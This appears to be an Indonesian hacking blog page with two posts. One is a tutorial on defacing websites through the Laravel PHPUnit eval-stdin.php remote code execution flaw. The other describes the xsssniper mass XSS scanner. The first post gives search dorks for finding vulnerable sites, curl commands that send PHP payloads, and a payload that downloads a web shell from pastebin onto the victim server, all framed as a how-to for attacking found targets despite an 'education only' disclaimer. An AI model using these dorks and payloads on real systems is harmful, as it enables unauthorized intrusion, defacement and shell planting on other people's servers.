Tampilkan postingan dengan label Pentest. Tampilkan semua postingan
Tampilkan postingan dengan label Pentest. Tampilkan semua postingan

Minggu, 26 Juli 2020

Exploit Laravel PHPUnit RCE ( Remote Code Execution )

Hallo ^_^  kali ini saya akan share tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )


Pertama Dorking dulu dengan dork dibawah in bro

DORK :

inurl:/vendor/phpunit/phpunit/src
inurl:/phpunit/src/Util/PHP/

Exploit  : 

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Ok ku anggap kalian sudah punya tagetnya, langsung saja kita exploitnya seperti ini
Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa.
Disini saya menggunakan curl untuk mengirimkan datanya karena simple dan tidak ribet hehe.
Untuk penggunaanya cukup gunakan parameter -d atau --data

Payload yang bisa digunakan :

<?php echo php_uname(); ?>
<?php echo system('id'); ?>

Contoh command

curl -d "<?php echo php_uname(); ?>" http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


Kalau ingin Upload Shell tinggal ubah payloadnya menjadi seperti ini :

<?php system('wget https://pastebin.com/raw/i7VyUpWu -O zero.php'; ?>


Setelah itu buka access Shell kalian di 

http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/zero.php


Mungkin sekian dulu dari saya mengenai artikel tentang tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."


Tag : phpunit rce, laravel phpunit rce, laravel framework phpunit rce exploit, laravel rce, laravel phpunit remote code execution


Selasa, 28 Januari 2020

XSSSNIPER An automatic XSS discovery tool

XSSSNIPER




xsssniper adalah alat penemuan xss yang berguna dengan fungsi pemindaian massal.

Apa yang dilakukannya adalah memindai URL target untuk parameter GET dan kemudian menyuntikkan muatan XSS (Y) ke dalamnya dan mengurai respons untuk artefak injeksi (Z).
Contoh paling sederhana adalah dengan menyuntikkan <script type = "text / javascript"> window.alert ('lol') </script> dan periksa <script type = "text / javascript"> window.alert ('lol') </script>, jika kami memiliki kecocokan mungkin kami baru saja menemukan XSS.

Jika tidak ada pemeriksaan yang ditentukan, xssniper akan mempertimbangkan muatan dan memeriksa yang sama.

Jika tidak ada payload yang ditentukan juga file khusus akan diuraikan untuk payload umum (lib / payloads.xml, silakan berkontribusi!).

Fitur lain yang bermanfaat adalah kemampuan untuk merayapi URL target untuk tautan relatif. Setiap tautan yang ditemukan ditambahkan ke antrian pemindaian dan diproses, sehingga lebih mudah untuk menguji keseluruhan situs web.

Pada akhirnya, metode ini bukan bukti yang terkecoh, tetapi heuristik yang baik untuk menemukan titik injeksi secara massal dan menguji strategi pelarian. Juga karena tidak ada emulasi browser adalah tugas Anda untuk menguji secara manual injeksi yang ditemukan terhadap berbagai perlindungan xss browser.

Download

git clone https://github.com/gbrindisi/xsssniper.git

Usage

Usage: xsssniper.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     target URL
  --post                try a post request to target url
  --data=POST_DATA      post data to use
  --threads=THREADS     number of threads
  --http-proxy=HTTP_PROXY
                        scan behind given proxy (format: 127.0.0.1:80)
  --tor                 scan behind default Tor
  --crawl               crawl target url for other links to test
  --forms               crawl target url looking for forms to test
  --user-agent=USER_AGENT
                        provide an user agent
  --random-agent        perform scan with random user agents
  --cookie=COOKIE       use a cookie to perform scans
  --dom                 basic heuristic to detect dom xss

Examples:

Scanning a single url with GET params:
$ python xsssniper.py -u "http://target.com/index.php?page=test"
Scanning a single url with POST params:
$ python xsssniper.py -u "http://target.com/index.php" --post --data=POST_DATA
Crawl a single url looking for forms to scan:
$ python xsssniper.py -u "http://target.com" --forms
Mass scan an entire website:
$ python xsssniper.py -u "http://target.com" --crawl
Mass scan an entire website forms included:
$ python xsssniper.py -u "http://target.com" --crawl --forms 
Analyze target page javascripts (embedded and linked) to search for common sinks and sources:
$ python xsssniper.py -u "http://target.com" --dom 

Copyright (c) 2012, Gianluca Brindisi < g@brindi.si >
Source: https://github.com/gbrindisi/